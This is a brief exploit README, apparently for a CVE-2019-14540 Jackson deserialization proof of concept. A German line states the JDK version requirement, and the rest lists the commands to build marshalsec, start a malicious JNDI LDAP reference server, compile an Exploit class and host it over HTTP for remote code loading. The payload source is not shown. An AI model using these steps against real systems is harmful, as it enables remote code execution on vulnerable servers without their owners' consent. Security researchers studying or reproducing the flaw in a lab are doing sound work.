
CVE-2019-14540 Exploit
http://www.leadroyal.cn/?p=939
Umgebungseinschränkung: Da dieses Demo die jndi ldap-Methode verwendet, wird eine niedrige JDK-Version (kleiner als 8u191) benötigt.
git clone https://github.com/mbechler/marshalsec.git
mvn package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 1389
cd remote_codebase
javac Exploit.java
cd remote_codebase
python -m SimpleHTTPServer
